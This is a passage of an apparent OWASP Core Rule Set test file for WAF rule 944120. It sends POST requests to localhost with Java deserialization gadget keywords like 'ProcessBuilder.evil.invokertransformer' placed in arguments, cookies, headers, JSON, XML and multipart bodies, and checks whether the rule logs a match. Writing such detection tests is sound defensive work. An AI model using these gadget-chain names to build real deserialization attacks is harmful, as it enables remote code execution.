Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-57 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-58 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-59 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-60 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-61 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-62 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-63 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-64 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-65 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-66 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-67 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-68 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-69 + desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-70 + desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-71 + desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-72 + desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-73 + desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-74 + desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-75 + desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-76 + desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-77 + desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-78 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-79 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-80 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-81 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-82 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-83 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-86 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + 